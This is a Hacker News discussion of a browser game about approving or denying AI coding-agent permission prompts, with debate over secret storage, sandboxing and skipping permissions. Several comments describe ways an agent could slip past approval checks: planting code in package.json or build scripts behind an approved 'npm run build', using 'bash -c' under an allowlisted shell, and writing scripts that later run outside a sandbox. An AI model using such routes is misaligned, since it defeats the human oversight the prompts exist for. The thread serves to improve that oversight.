Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue

5/28/2026 at 4:24:07 PM

This is amazing!

Currently you can "cheat" by simply denying all requests as quickly as possible. This will give you the "security-conscious engineer" badge and a perfect score in terms of how many requests were processed. (You will get the "overblock" notification, but it's somewhat tucked away at the bottom and the screen still looks as if you won)

I also tried to play as the hustle4lyfe move fast and break things engineer and simply approved as many requests as quickly as possible - turns out, the "malicious command" popups actually slow you down. Mean!

by xg15

5/28/2026 at 7:45:12 PM

Good catch, this has now been nerfed and this approach has gotten its own title

by Wirbelwind

5/28/2026 at 10:31:39 PM

Actually, the only secure default is to deny everything...how do you know that innocent command is actually innocent?

by smaudet

5/28/2026 at 11:14:38 PM

A strange game. The only winning move is not to play.

by ssl-3

5/29/2026 at 12:57:35 AM

It’s the security mantra: the safest code is the one you never release. Code that never runs is the most secure code

by SOLAR_FIELDS

5/29/2026 at 1:21:54 AM

A computer is only secure if it remains powered off and airgapped.

by brendoelfrendo

5/29/2026 at 2:58:54 AM

Turn off your computer and make sure it powers down

Drop it in a 43-foot hole in the ground

Bury it completely, rocks and boulders should be fine

by HappMacDonald

5/29/2026 at 4:39:26 AM

> rocks and boulders should be fine

You’re setting yourself up for a supply chain attach here if you trust whatever rocks and boulders are sitting around. A well resourced adversary may have placed power supply boulders and wifi rocks in your back yard.

by onionisafruit

5/29/2026 at 7:03:57 AM

I keep a large supply of thermite on-hand just to make sure that the computer is completely burned every day after it gets dropped into the pit.

Tomorrow is a new day.

by ssl-3

5/29/2026 at 6:54:30 AM

Straight Outta Lynwood was a great album. One of the CDs that I took out of my case the most often as a struggling nerdling who was still a year or two away from having scrounged up enough spare cash for a secondhand iPod.

by JonathanMerklin

5/29/2026 at 9:42:23 AM

Virus alert! I've also burned all of my clothes I may have worn any time I was online.

by yuye

5/29/2026 at 9:31:42 PM

Joshua

by weitzj

5/30/2026 at 6:00:41 AM

Would you like to play a game?

by ssl-3

5/28/2026 at 7:54:54 PM

Top 18%! I denied everything, unless I could see at a glance that it was safe (like Git diff)

by KajMagnus

5/28/2026 at 9:16:21 PM

Glad I could help. I love the new title :D

by xg15

5/28/2026 at 8:07:06 PM

Just like real life! deny it from doing anything and you're safe :)

by progforlyfe

5/28/2026 at 5:27:30 PM

Fun game, but it showed the lack of security hygiene employed by the game writer. It said `cat ~/.zshrc` was bad because it would share tokens and secrets, but I would never put secrets into my shell rc.

by spurgelaurels

5/28/2026 at 5:50:49 PM

Plenty of people would. But then I guess they're in env and probably already available to Claude

by londons_explore

5/29/2026 at 1:56:41 PM

Just aside from all of the security concerns, this is the wrong place to define global environment variables for zsh in the first place! That would be ~/.zshenv. So even if you're clueless about storing secrets in plain text and exporting them as env vars everywhere, ~/.zshrc should still be clean.

by isityettime

5/29/2026 at 7:17:58 AM

Having "tokens and secrets" at all is a lack of security hygiene.

by otabdeveloper4

5/29/2026 at 4:24:09 AM

I don't do this myself, but I can also see how many would do this.

by shlewis

5/28/2026 at 5:50:12 PM

Where would you put them?

by nish__

5/29/2026 at 3:44:33 AM

Literally anywhere else! Your dotfiles should be publishable to github. If they aren't you're doing them wrong.

A good thing to do is organize. You can actually load different files. Here's a pretty common pattern that you'll find and it'll illustrate how to do other things

  if [[ $(uname) == "Darwin" ]]; then
      source "${INSERT_SOME_DIR}/osx.zsh"
  elif [[ $(uname) == "Linux" ]]; then
      source "${INSERT_SOME_DIR}/linux.zsh"
  fi

You do this for loading based on the operating system. You might want some aliases, commands, or other routines in one but not the other. For example, in my linux one I have stuff for cuda paths. You can do all sorts of things too, like make a (generically named) work file, which you don't publish to github but you load it if it exists. Then you can put all your work related aliases there and not contaminate anything else. Something like `[[ -a ${INSERT_SOME_DIR}/work.zsh ]] && source ${INSERT_SOME_DIR}/work.zsh`.

You shouldn't really load secure keys this way, but others had good answers so I thought I'd at least share a more general pattern since it isn't as well known among the less terminally inclined.

by godelski

5/29/2026 at 7:21:09 AM

Okay. Here is a pattern i follow everywhere in my init files for almost every program. Define two key env vars. $DOTFILES and $ECORP. The first is path to your personal set of dotfiles. The second is path to your corporate specific dotfiles.

On personal pc no need to define the $ECORP var in shell init. On work pc define that var.

based alone on that you can conditionally do almost anything.

- shell source files/aliases

- vim/editors enable disable plugins based on existence of env vars.

- define shortcuts in file manager.

- and i add the following to my main $DOTFILES .gitignore.

  # Any file that contains the following will be ignored.
  # Used to ignore files in corporate environment
  *ECORP*
  *ecorp*

Based on multiple years across different setups, using environment variables was the most reliable option since I have been in places where there are restrictions on where my init files can be placed and having to change a shit ton of paths in my dotfiles or just keeping a different branch for work and personal (and making sure they stay in sync) was too much of a hassle.

Additionally, maintaining hygiene is essential, where I only use a Read Only PAT token on my personal dotfiles in workenv. That way, there is no accidental way I would be able to push from my workenv.

by analog_daddy

5/29/2026 at 9:44:26 AM

You’re just splitting your dotfiles into a public and a private part. That’s useful if you want to publish the public part on GitHub, but not everyone wants to do this, and the issue of storing secrets in plain text files remain.

by hk__2

5/29/2026 at 3:28:58 PM

  > You’re just splitting your dotfiles

Ummm... yes? That is what I said

  > the issue of storing secrets in plain text files remain.

Ummm... kinda? The problem was that reading an rc file was considered dangerous. Not putting keys in your rc files is an improvement. Encrypting them is even better than that. But I also said more words in the original post and you don't really even need to read between the lines to figure out I said "you can generalize this", especially when there's comments next to it saying "here's how you load an encrypted file"

by godelski

5/28/2026 at 11:53:21 PM

Anywhere else? Password managers have CLIs, operating systems have their own secure storage, and lots of command line apps can store secrets in the OS's secure storage (Windows Credential Store, Secrets Service or KWallet on Linux, macOS Keyring).

Project-specific secrets can be stored locally via something like SOPS or remotely with something like Hashicorp Vault or AWS SecretsManager.

Applications that have secrets to manage (e.g., Emacs) or are partly about secrets management (e.g., GnuPG, OpenSSH) all store their secrets somewhere else and have secure (not plaintext, sometimes not even on disk) storage options available.

There's no reason to store secrets in plain text in your shell configuration. Practically any choice you can think of is a better one. Even if you did, there's no reason you couldn't store them in a more specific file that ~/.zshrc sources, and let LLM agents read zshrc but block access to the file containing your secrets. (I wouldn't rely on permissions prompts for this, though, lol.)

by isityettime

5/28/2026 at 7:17:30 PM

I put mine in various aes encrypted file (like `~/.secrets.aes`) and then source it explicitly when needed with:

    . <(aescrypt -d -o - ~/.secrets.aes)

I have a handful of aliases/functions to make it more smooth, but that's the core.

by freedomben

5/28/2026 at 7:50:16 PM

Where are those aliases stored?

by maccard

5/29/2026 at 12:09:55 AM

The AES encrypted file has some, plus a bunch of exported env vars. I do keep one function in my ~/.bashrc to make it simpler to invoke so I can do `source-secret ~/.secrets.aes`:

    source-secret()                                                                                                                                               
    {                                                                                                                                                             
      if [ -z "$1" ]; then                                                                                                                                        
        echo "Need filename to source"                                                                                                                            
      elif ! [ -f "$1" ]; then                                                                                                                                    
        echo "File '$1' does not exist"                                                                                                                           
      elif ! which aescrypt >/dev/null 2>&1; then                                                                                                                 
        echo "Could not find required dependency 'aescrypt'"                                                                                                      
      else                                                                                                                                                        
          . <(aescrypt -d -o - "$1")                                                                                                                              
      fi                                                                                                                                                          
    }

by freedomben

5/28/2026 at 8:47:45 PM

In that AES encrypted file.

It's a shellscript that they encrypted. They decrypt it and feed the decrypted output immediately into the shell, to be sourced.

That encrypted secrets file could contain any shellscript, so the aliases are stored in there, together with the API-Keys and passwords.

by AnyTimeTraveler

5/29/2026 at 1:01:09 AM

Another more secure pattern: have different shell profiles that just go dynamically inject secrets from a secrets manager. Nix is a good tool for this. You have various shell profiles configurations that call your password manager cli at bootstrap (eg new terminal tab). You auth and at bootstrap of the terminal time the secret is dynamically fetched from the password manager and injected into an env var. this has advantage over other approaches mentioned here in that the secret is never stored at rest on the end user’s machine only used in flight

by SOLAR_FIELDS

5/28/2026 at 6:01:21 PM

Presumably a CLI-accessible password manager (like `pass`) or a GPG-encrypted file (like a netrc-style `~/.authinfo.gpg`).

by setopt

5/29/2026 at 3:54:06 PM

I've recently been enjoying https://fnox.jdx.dev/.

by andrewaylett

5/28/2026 at 6:01:47 PM

Into `pass`, for example:

https://news.ycombinator.com/item?id=48108207

by Hackbraten

5/29/2026 at 7:32:41 AM

Just curious, any reason to prefer using age (you mentioned that you would prefer it if starting over), over something like keepass? I am currently using keepass-cli and only reason i did not use age even though i found it was that it was new to me and I never heard of it (probably not the best reason, but in this era might be a reasonable thing to stick to devil you know). So curious about your take on this.

by analog_daddy

5/29/2026 at 7:05:48 AM

Also, there's nothing inherently insecure about feeding secrets to an LLM, it's only one element of the lethal trifecta.

by arowthway

5/28/2026 at 6:43:55 PM

Weird to make reading zshrc supposed unsafe when I happily publish it in my public dotfiles repo... Who the hell keeps API keys in it? OTOH it seems like lots of these AI tools keep appending PATH in it so I guess there's a fundamental misunderstanding of shell best practices in the entire AI space...

Additionally, killing the results of `lsof` is _not_ safe - if, say, you have the web page open in firefox, or a client subshell in the agent itself, then boom, there goes firefox and the agent.

by socksy

5/28/2026 at 8:05:15 PM

Yeah, the game seems to assert that the kill is safe to run because Claude told me it was safe. But that's the point, I'm not supposed to trust Claude.

by mrgoldenbrown

5/29/2026 at 1:38:51 PM

Likewise I got dinged for denying a random stash-rebase-pop operation. I have no idea what the repo state is like right now. That could be a wild mess of a waste of time. It says I'm doing a refactor, so OK I guess rebase on main is a good idea. But hell no I'm not approving that in the 1 minute before a meeting.

The whole premise IMO is pretty flawed. It's interesting as an ad for the company though.

by gwerbin

5/30/2026 at 1:49:12 AM

> The whole premise IMO is pretty flawed.

I'm not sure, maybe the fact that whether a given command is safe or not is subtle, contextual, and contested actually bolsters the point the game is trying to make.

by isityettime

5/28/2026 at 4:16:42 PM

Fun little game, but I think the questions jump context so much it's a little unrepresentative. It might be better to group things into "packs", which have more real-world representative structure to them. For example, lots of "editing something.js" file permission requests, and then an "npm publish" is far more normal, and it's more of a risk, if you're used to pressing Y lots and then suddenly out of the blue...

by axod

5/28/2026 at 6:38:11 PM

About three quarters of the "bad" choices are things that not only do I not care about leaking but things that an employer would not punish you for doing, even if it led to a production incident.

by orsorna

5/30/2026 at 1:49:59 AM

For example?

by isityettime

5/29/2026 at 3:26:15 AM

Love it. One nitpick.

>npm config set registry https://npm.internal

>Pointing npm to the company's internal registry mirror as required by onboarding docs

It claimed this is safe and I was 50/50 on it but eventually rejected it.

If this README is for a public / forked repo, and that https://npm.internal is actually https://npm.internal.somethinganexternaldnscanresolve.tld

This can go bad really quickly...

In 99% of cases you would have Artifactory / Nexus (or other mirror) already set by company policy. Having a README tell you to use a different package manager url is a big red flag and seconds away from disaster...

by eranation

5/29/2026 at 7:49:44 AM

that's a good callout. .internal is a reserved TLD so it shouldn't resolve publicly, but that's a good point about being wary of changing this while letting claude refactor a project for something that's best configured separately. Moving it to permanent mutation!

by Wirbelwind

5/28/2026 at 8:31:46 PM

The permission thing is a killer to productivity, if you're running Claude I think it's more efficient to just run in a disposable sandbox (like exe.dev[1]) or in some form of docker container with permissions you're personally ok taking the risk with on a personal machine[2]

[1] - https://exe.dev/ is a new cloud provider with some very useful agent UX [2] - I built https://github.com/stanislavkozlovski/dclaude/ for this; not perfect but gets my job done on the rare occassion I need to run the coding agent locally

by enether

5/28/2026 at 9:41:30 PM

A disposable sandbox wont protect you from secret exfiltration. Assuming you don't consider your code a secret, you could of course set up your sandbox so it doesn't have any secrets, but that would severely limit the kinds of tasks you can use the agent for.

by kvdveer

5/29/2026 at 1:01:57 PM

<< that would severely limit the kinds of tasks you can use the agent for.

Are we just talking about API calls to providers? If so, wouldn't local agent + sandbox solve all that?

by iugtmkbdfil834

5/28/2026 at 10:05:45 PM

On the one hand, you can set up a proxy that supplements secrets for API calls. On the other hand, you can whitelist what you need, in the simplest case with iptables (The devcontainer in the claude code repo is an example of the latter).

by esterna

5/28/2026 at 3:50:14 PM

I vibe coded a TUI that just shows running lxd containers

I hit 'n' to toggle all network access minus anthropic and openai URLs.

I use pi (sometimes claude, always on bypass) and I auto allow everything. I only toggle manual approval in rare cases like running a script or command that needs to touch a production system and I need to validate everything.

Normally my container has full write access to staging so it can debug and validate everything on its own

by zackify

5/28/2026 at 5:01:02 PM

Sounds like your process has made you vulnerable to huge classes of exploits and accidents. You have no oversight of changes locally, and only focus on when it touches prod. That means toxic local changes can get in, and if it works in staging why would you look too closely at it before merging to prod? Meanwhile a malicious npm package has made it into your repo, and your staging api keys have been sent to the command and control server.

by kennywinker

5/28/2026 at 8:44:19 PM

i can view the diff locally but often times after planning with opus i get what i want.

I create a draft pr and manually review all items before then marking ready for review for the team.

So I'm not blindly pushing things to prod without review.

Without staging key access I wouldn't have been able to do a payment provider migration at this speed. iterating by migrating users in staging and being able to use and validate the sdk quickly with opus is a massive time saver.

by zackify

5/28/2026 at 3:49:13 PM

That's funny. It told me that blocking "npm run build" was the wrong answer. Maybe it doesn't really under The threat model.

by cobbal

5/28/2026 at 4:47:20 PM

That's a great example of how dangerous actions are perceived as innocent. The entire model of approving specific commands is absolutely bonkers.

npm run build = run an arbitrary shell command written in package.json

Meanwhile the agent could have done any of the following without approval:

- edited `package.json` to contain any arbitrary build command

- planted malicious code in `build.js` (called by `npm run build`)

- planted malicious code in `node_modules/xyz/index.js` (imported by `build.js`)

by dns_snek

5/28/2026 at 6:23:08 PM

Yup. The most secure computer is one encased in concrete and dropped into the ocean.

by nonethewiser

5/28/2026 at 8:54:16 PM

Concrete alone isn't enough, you also need to have it be enclosed in a Faraday Cage.

by falcor84

5/28/2026 at 7:48:26 PM

that's a great point, and also the problem with relying on a human-in-the-loop to catch these kind of issues when it can be circumvented even if they were perfect

by Wirbelwind

5/28/2026 at 6:15:25 PM

What would a better system look like?

by amarant

5/28/2026 at 10:02:29 PM

Agents should make better use of OS sandboxing facilities with finer-grained ACLs.

Less: Do you want to run "npm run build"?

More: "npm run build" tried to read your Chrome cookie database, do you want to allow that?

Some agents like Codex use sandboxing on Linux/MacOS but the permissions are far too coarse - they'll run the command in a relatively strict sandbox and when it fails they'll ask you to allowlist the command as a whole, forever. There should be a new permission prompt every time a command tries to do something new.

Claude suggests (or used to suggest - it's been a while) to allowlist "bash" which completely defeats the point. If you do that the agent can run `bash -c "echo literally anything"`

by dns_snek

5/29/2026 at 1:05:49 AM

Don’t rely on your non deterministic agent and its creators to secure your software. Design defense in depth and trust guardrails that don’t expect Anthropic to vibe good security into existence.

If you start by treating any autonomous actor in your system as an actor with the potential to go rogue the design starts to create itself

by SOLAR_FIELDS

5/28/2026 at 6:24:03 PM

Not using agents at all. It could edit your code to do something malicious when you run it. Not even once. Not even if the agent has a gun to your head.

by nonethewiser

5/29/2026 at 2:29:25 PM

Don’t give a fancy random text generator access to your computer.

by xigoi

5/28/2026 at 8:08:13 PM

I got "approve" wrong for `ls -la ~/Documents` but I don't consider simply listing the documents folder a security problem, it's just file names. If it was reading the CONTENTS of them, maybe...

by progforlyfe

5/28/2026 at 11:53:35 PM

I wish it the scoring readout at the end would display the LLM's descriptions of the commands I shouldn't have approved. I approved the rm -rf Projects command because I thought the LLM had correctly described that it would delete everything in the Projects folder. Clearly I misread that in my hurry to answer prompts (I knew what the command would do and I guess I hallucinated that the AI had explained it), but I'd like to see what it was that I misread.

Playing this game made me very glad I don't agentmaxx.

by trehalose

5/28/2026 at 4:13:40 PM

Thanks all for checking it out and your suggestions!

If anyone is curious about the actual underlying risks and problems with some mitigations (like the 17% false-negative rates of Auto Mode), I wrote up a quick summary of some of the approaches here

https://scalex.dev/blog/ai-agent-permissions/

by Wirbelwind

5/28/2026 at 8:02:34 PM

You might want to check out https://github.com/kstenerud/yoloai

by kstenerud

5/28/2026 at 3:40:46 PM

I haven't used local agentic AI yet for programming projects. Hence, -187 score

The filter for "commands I would run myself" and "commands I would let an agent run" are very different it seems.

by Liftyee

5/28/2026 at 6:36:02 PM

Thinking about agents as remote junior devs who _might_ be North Korean operatives has been the right model for me.

by rogerrogerr

5/29/2026 at 9:40:15 AM

How do you know?

by jstanley

5/29/2026 at 2:51:42 AM

Yeah, echoing the comments here. It's a good idea - kind of - but it is all about digging deeper when it is sus.

The tool assumes so much. That it is fine to kill a process itself versus just asking you to kill the process. That everyone MUST have passwords in their home directory. It's all meaningless without providing the thing it is running and so no activity is technically safe.

Why do people even get the agent to run the commands it asks to run? You can solve the entire threat vector by running it yourself and giving the agent the output. Claude practically only needs things like sed, awk, and grep. It's a pattern matcher. It's a waste of yours (and its) time to have it run your project.

by conrs

5/28/2026 at 4:20:41 PM

--dangerously-skip-permissions is the only way to fly. Of course your environment needs to be properly containerized and autobackup set up, so even rm -rf from your harness would do nothing. Life is too short to spend on replying to permissions requests.

by atemerev

5/31/2026 at 6:29:40 PM

It's true.

I think most people would be horrified about how I run. I just have a hook that blocks obviously unsafe commands (removals, reading secrets, etc) but other than that, the agent is free to do whatever it wants on my machine.

I used to run in a sandbox but for me personally I see these agents as fairly well aligned / intelligent and I am the one prompting them so the risk of injection is none. The hooks are just there to prevent them from getting too ambitious or crafty.

by madamelic

5/28/2026 at 5:07:59 PM

I've seen these suggestions but I am really curious about the set up because I just don't get it.

If you want to work on the code then you need to have access to the repositories, so you need the github token. Then, to test the app, you may need your own backend token. And VPN. Of course, only to DEV, of course all tokens encrypted. So, only DEV and your branch of the code is in danger. In my view, even that is pretty bad.

So, how does such a set up work?

by prerok

5/30/2026 at 2:17:08 AM

> If you want to work on the code then you need to have access to the repositories, so you need the github token.

Definitely not! I only have an agent work in one repo at a time, with cross-repo work coordinated by me. I have a ton of local checkouts and leave them visible read-only to all of my agents. They can look at company code in my local checkouts, and they can download or browse open-source code, or look at it in the .src outputs of packages from Nixpkgs.

> Then, to test the app, you may need your own backend token.

I just don't let my agents test apps that run remotely, for better or for worse.

> And VPN.

This doesn't really expose anything on my system because everything internal that it could hit is authenticated, and it can't access any of my credentials. But I could do a better job restricting network access.

> your branch of the code is in danger

The agent isn't permitted by the sandbox to read the secrets it needs for `git push`. Indeed, I have commit signing enabled and the agent can't even read the files it needs for git commit! It can write code, it can write tests, it can run some tests, and it can run web applications locally and play with those.

But then I do the final testing and then turn its changes into 1-5 git commits, walking through them and selectively staging, skipping, or dropping them hunk-by-hunk according to my judgment. I still do tons of review. I just don't review edits or commands; instead I review and test whole drafts, whole changesets. It's less fatiguing because the thing I'm reviewing is more directly the thing I'm trying to produce.

I guess it ain't YOLO nirvana but I wasn't really looking for that.

by isityettime

5/30/2026 at 6:36:21 AM

Thank you for the explanation but I still don't quite get it. Is this code mounted to a separate VM where the agent is running? I mean, how does the sandboxing of agents really work?

The reason I am asking is because if it's not sandboxed on the OS level, then commands it runs may escape the harness sandboxing. Even more problematic can be a command added to some auto running script that will get executed at some point outside of the sandbox (when the developer is doing actions). So, reviewing everything before anything is executed seems like the only safe way to do it. What am I missing?

by prerok

5/30/2026 at 1:45:34 PM

The tool I use currently is OS-level sandboxing (the OS does the sandboxing), not sandboxing built into the harness (like what Codex has turned on by default) or hypervisor-level sandboxing (i.e., the agent sees an OS that is sandboxed or an OS that constitutes the sandbox). To relax or adjust the sandbox, I have to kill the agent and reinvoke the sandbox with a new policy, which then relaunches the agent.

> Even more problematic can be a command added to some auto running script that will get executed at some point outside of the sandbox (when the developer is doing actions).

That's a real potential problem, but unfortunately the default "approve every edit" regime doesn't actually address it, either. In the normal per-command approval process, the approvals are often just suggestions; Claude will do things like silently edit files in "plan mode" anyway, for example.

If you're deeply worried about this particular kind of sandbox escape you probably don't want the agent's checkout to be your usual checkout. Then if you do have some scripts that can run automatically inside a project directory (e.g., via direnv), you just never approve them in the path to the agent's checkout and make sure direnv's state dir is unwritable inside your sandboxes. If you have code inside your project that runs without any user intervention at all, and has no approval process at all so that it will be activated or trusted even on a fresh clone you've never visited or seen before... yikes. That sucks. :(

Anyway if you take the precaution above you can still review edits to those files before they have a chance to run (or just never run them).

One thing suggested by another user in this discussion that sounds like a useful approach to me is also giving the agent a VM from which they can push to a local bare clone or something like that so that's how they emit code to you. That way they're not writing scripts to your box at all.

by isityettime

5/28/2026 at 11:28:22 PM

Git makes actions reversible. Containers and VMs allow the agent to access only the things you explicitly put inside. Okay, yes, an agent can corrupt a dev database. You need to make sure it can be easily restored anytime. Simple.

by atemerev

5/28/2026 at 8:14:09 PM

You could clone the repo yourself and not give the agent any tokens at all. When done, push it yourself. This also lets you sandbox the agent to only have access to the local repo and nothing else.

by stratos123

5/28/2026 at 5:05:07 PM

Lol. Countdown til you get pwned starts today. Let me know how that works out for you in six months.

by kennywinker

5/28/2026 at 11:25:28 PM

Well working like that for about a year already, starting at the earliest days of agents.

by atemerev

5/28/2026 at 11:36:00 PM

Wow a whole year! I guess it’ll never happen.

by kennywinker

5/28/2026 at 8:03:06 PM

Permissions don't do much. They won't save you. You can just skip them completely.

If you are afraid that AI can delete something do what you'd do with potentially malicious user. Sandbox, don't give permission, setup remote backups and so on.

Also (unless prompt injected) models are not eager to start going rouge on your stuff.

But keep in mind a saying “Children don’t hear prohibitions — they hear suggestions.”

Same thing goes for LLMs. Never talk with LLM about deleting stuff. Archiving, moving, retaining elswhere... sure, but never about actually destructive operations. Don't use destructive language.

by scotty79

5/29/2026 at 9:20:23 AM

I declined things like rm -rf because the path was relative and it wasn't showing me the current directory. How would I know what project it was in?

by gblargg

5/28/2026 at 5:37:26 PM

I was told I was over protective when the text said “I need to wipe and build my project” and its first thing to do was to read the details of the (already established) package file. Why did it need to read the package file to “get context” if it was just doing a standard wipe and build?

Apparently me telling it that’s the wrong first step and saying “no” is bad; but I’ve seen AI tools waste a ton of time doing a bunch of random work before they do their job.

by t-writescode

5/28/2026 at 3:38:45 PM

I am mostly using OpenCode and barely ever see a permission prompt. While they do enforce it for outside workspace read/write, with the bash tool the agent can just bypass that. I'm not quite sure why it is that way, and it certainly isn't a very good solution, but likely not worse than asking for everything which just trains the user to always accept and provides a false sense of security then.

by ghrl

5/29/2026 at 10:40:36 AM

Is there a light mode by any chance? Unfortunately, I cannot look at light text on black background for more than a few seconds (something must be wrong with my eyes...).

by kleiba2

5/28/2026 at 10:18:17 PM

I've long held the current agent permission model is like playing a game of "Papers, Please" and most permission models engineers implement in their own AI products is more a measure of how trusting the user is with AI than an actual permission check.

I'm of the view that future controls should be more about approving plans and rewinding durable workflows as models get better at avoiding egregious mistakes.

by madrox

5/28/2026 at 10:44:42 PM

the models will never avoid egregious behavior. think of it like every "good intentions" morality tale. theres almost always some geniune context where that behavior is wanted.

instead, the coding harness or determinative tool, will need hardcoded security features.

in opencode, almost all the power comes from bash and all other permissions are just chrades. its powerful and insecure because of it.

you can sand box them but then you fight the sandbox to pipe in your assets. the sandbox becomes porous because elsewise its useless.

MCPs dont address much either.

want we are looking for is a portal or protocol that has the model and harness and the actions tunneled, like ssh, to some fixed scoped and limited shell along side the assets.

then, the user and LLM can the negotiate assets and actions as needed via the protocol.

but alas, as your comment suggests, people thing theres some perfect context thatll prevent bad things from happening. the libertarian paradise without regulation.

by cyanydeez

5/31/2026 at 6:34:54 PM

> we are looking for is a portal or protocol that has the model and harness and the actions tunneled, like ssh, to some fixed scoped and limited shell along side the assets then, the user and LLM can the negotiate assets and actions as needed via the protocol.

Take a look at a project I just finished this weekend: https://clawband.io

It's an agent permissioning platform that isolates your service connections and puts a granular permissioning layer on it. So rather than your agent getting full access to a service, they get a Clawband key that can be used to request actions then Clawband checks the parameters to see if it is allowed.

The classical example I have made is allowing your agent access to privacy.com. You may want it to be able to list your cards but not create one or you may want to allow creating cards but only a certain limit.

The plan is to make it open-source and allow self-hosting because security / sanity of users but still have a SaaS offering as a demo / ease of use.

by madamelic

5/28/2026 at 11:55:11 PM

I think you're choosing to ignore what I said about the implication of durable workflows, because you seem to be inventing some stories about my comment.

I find that well documented plans do pretty well at aligning AI to what I want it to do, and if it does go astray, as you rightly point out it can still do, it would be sufficient if I can undo it with little pain. We do this kind of thing all the time in CI/CD pipelines.

Even humans can take down production. We have all kinds of guards in place to empower while also defending against the intern accidentally dropping the DB.

by madrox

5/28/2026 at 3:27:56 PM

It would be cool to see the distribution of all player scores.

by MeetingsBrowser

5/28/2026 at 4:09:53 PM

That's a great idea, stay tuned

by Wirbelwind

5/28/2026 at 7:44:12 PM

and added! Made one for each stat separately

by Wirbelwind

5/29/2026 at 10:13:22 AM

Claude Code has gotten so bad about this that I’ve stopped using it for code reviews. I may look into wiring Claude up to Codex as an alternative LLM just to compensate.

I think the issue is that I’m running Claude Code in a container so it sees that it is root, and becomes a lot more cautious. Not sure, though.

by christophilus

5/29/2026 at 12:08:48 PM

If you're running Claude Code in a container anyways, why does `--dangerously-skip-permissions` not work for you?

by kangalioo

5/29/2026 at 1:50:48 PM

Claude Code won't let you do that as root. Codex's equivalent is perfectly fine, though.

by christophilus

5/28/2026 at 1:24:38 PM

Use this and save yourself:

claude --dangerously-skip-permissions

by nardib

5/28/2026 at 3:28:41 PM

Just make sure to run it in an isolated environment where it's ok to mess things up, and make sure it doesn't have access to any secrets.

by tasuki

5/28/2026 at 3:21:13 PM

This is why having a human in the loop isn't enough because they will cut corners and skip reviewing what they should review.

by wildpeaks

5/28/2026 at 4:14:48 PM

I created a watcher for this problem, to watch my PRs for unfinished scope and have a fresh Claude review

Uses tmux and gh https://github.com/Kyu/claude-pr-watch

by preciousoo

5/28/2026 at 3:25:42 PM

A tool that pushes people into permissions fatigue is in fact the proper recipient of the blame. The tool in question here is the entire system though, including the OS with insufficient permission boundaries in userspace, not just the agent

by chuckadams

5/28/2026 at 5:12:57 PM

A tool that bypasses permission requests because they’re annoying will be just as guilty when the repo is poisoned.

by kennywinker

5/28/2026 at 6:22:47 PM

I'm not saying wedging doorstops under the fire doors is a good thing, I'm just saying look at the situation that's making people put the doorstops there. Or something, it's not a great analogy. I'm just saying that shaming the user belongs with obscurity in the list of security mechanisms that don't work out in practice.

by chuckadams

5/28/2026 at 3:47:22 PM

I got tired of typing that and just do

    alias claude="claude --dangerously-skip-permissions"

I do have a separate "claude" user on my system without sudo access and without access to my main user home dir

And yeah I know that's not perfect but I'm trying to get shit done

by dheera

5/28/2026 at 4:12:23 PM

alias claude+="claude --dangerously-skip-permissions"

alias claude++="claude --dangerously-skip-permissions --continue"

by franze

5/28/2026 at 5:08:00 PM

It’s baking malicious code into your project, but hey it didn’t run rm -rf so… we’re good.

by kennywinker

5/28/2026 at 4:37:42 PM

  alias yolo=claude --dangerously-skip-permissions

by paulddraper

5/28/2026 at 6:02:30 PM

Why would you do this now that we have auto mode?

by maxbond

5/28/2026 at 3:18:53 PM

I love it when Claude is dangerous

by qsxfthnkp2322

5/28/2026 at 5:23:41 PM

I got "overblocked" for this one:

  rm -rf node_modules && npm install

but actually if you're only removing `node_modules` and you have a working package-lock.json already, what you want is `npm ci`; `npm install` can mutate package-lock.json and potentially expose you to supply chain attacks. If you use `npm ci` I think you don't need to `rm -rf node_modules`, either.

Anyway you should generally run `npm ci` except when you're deliberately updating your actual dependencies. I'd only permit an `npm install` if I was adding or updating a dependency, or I'd just reviewed an `npm ci` failure.

by whimblepop

5/28/2026 at 5:41:25 PM

But also why would Claude need to run `rm -rf node_modules && npm install`? Without the context of seeing what changes it’s made, I’d be inclined to assume that Claude has added a new dependency, which I definitely don’t wanna blindly trust it to install

by gamer191

5/30/2026 at 1:57:01 AM

If the shipped package.json and package-lock.json are actually incompatible/incorrect, something like `npm install` is what you need to reconcile them. But that's definitely a weird situation I would rather investigate myself than hand off to an LLM.

by isityettime

5/28/2026 at 8:11:08 PM

thanks for the pointer! renamed it to npm ci so it's still 'safe'

by Wirbelwind

5/29/2026 at 3:24:07 PM

Thanks! Love the game as a whole :)

by whimblepop

5/28/2026 at 4:18:36 PM

Fun! Played twice and refused all dangerous commands, with only one "over-block". Although I disagree that saying no to `kill $(lsof -t -i:3000)` is over-blocking. It's such a simple command I'd rather run it myself and be fully aware of what process I'm killing.

by kqr

5/31/2026 at 1:31:49 AM

Nice game to aware the security.

by JimmyElm

5/28/2026 at 4:05:26 PM

Fun game. Can somebody run an agent against those questions to see how it performs? :)

by soanvig

5/28/2026 at 6:15:36 PM

Sadly unplayable - gray text on a black background is very hard to read on a phone

by stevenalowe

5/29/2026 at 6:24:13 AM

I was so tired of all those approvals that I switched to Yolo mode exclusively.

Claude works in his own separate vm with root access, git remote set to my local copies of repository no github access etc.

I think he could still hurt me if he really wanted, but most scary stories I heard were about LLM making really bad judgements rather than actively trying to break out and do harm.

by kuboble

5/28/2026 at 6:47:52 PM

I haven't run claude code without --dangerously-skip-permissions in quite some time. I'm surprised that it's still the norm to endure permission spamming?

(I run it on a VPS of course, not my laptop)

by jMyles

5/28/2026 at 4:56:47 PM

Interestingly I kept saying no to everything and some how I am a security conscious rare engineer who actually read the commands. Guess doing nothing is the safest approach from security standpoint.

by sandeepkd

5/28/2026 at 4:58:57 PM

Reminds me of the "Papers, please" game. Glory to Arstotzka!

by sukhavati

5/29/2026 at 6:32:39 AM

PSA: not making safe environments where you can skip all permissions and instead wasting time monitoring agents == incompetence

by hcks

5/28/2026 at 4:22:51 PM

That was fun and gave me an idea how security conscious I am.

by misbau

5/29/2026 at 5:21:20 AM

Damn this is so cool, this has the potential of being a like textbook pre training/post training quiz. Congratulations.

by ashm1104

5/28/2026 at 4:41:46 PM

git reset --soft HEAD~1

Uh, how is this an overblock? It is literally a destructive command. No way I want an LLM agent rewriting my commit history. What if that commit was already pushed to a protected branch?

by NewJazz

5/28/2026 at 6:19:12 PM

Why do you call it destructive? It rewrites history only locally and reversibly (the disappeared commit is still in reflog and can be recovered with another reset) and also doesn't destroy uncommitted changes, so it's quite safe. You can only lose data with it by resetting an unpushed commit and then waiting long enough to let the unreferenced commit be garbage collected.

by stratos123

5/28/2026 at 6:25:20 PM

Commit history is data. I might not realize what happened until the gc happens.

by NewJazz

5/29/2026 at 1:06:10 PM

